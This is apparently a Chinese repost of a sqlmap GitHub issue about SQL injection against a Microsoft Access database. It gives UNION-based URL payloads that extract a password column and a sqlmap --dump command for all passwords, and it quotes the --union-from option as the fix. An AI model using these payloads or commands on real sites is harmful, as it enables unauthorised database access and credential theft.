[转]sqlmap注入Microsoft Access

https://github.com/sqlmapproject/sqlmap/issues/423

引用

Valid statements that show the numbers in the resulting html page:

...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar

- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table

The following URL gives you one password:

...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar


Now I wanted to hand over to sqlmap to dump all passwords:

sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump

which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.

- - sqlmap was able to detect the number of columns is 13 (correct)
- - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
UNION based sqli)
- - sqlmap was able to confirm the existence of table name (with --tables)
(echo foobar >  txt/common-tables.txt)
- - sqlmap was able to confirm the existence of column name password
(with --colums)

When running something like:
- --technique=U --union-cols=13 --union-char=1

sqlmap requested something *like*:

...id=-123 union all select
1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
MSysAccessObjects%00

which results in the following error message (shown in the html page):

The Microsoft Jet database engine cannot find the input table or query
'MSysAccessObjects'. Make sure it exists and that its name is spelled
correctly.

So if sqlmap would accept a known tablename on the command line that
it would use to detect/confirm the union based sqli vuln, instead of
using "MSysAccessObjects" this would make sqlmap more useful
(or simply use the table name specified in -T or previously
bruteforced to detect union-based sqli).

solution：

引用

Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads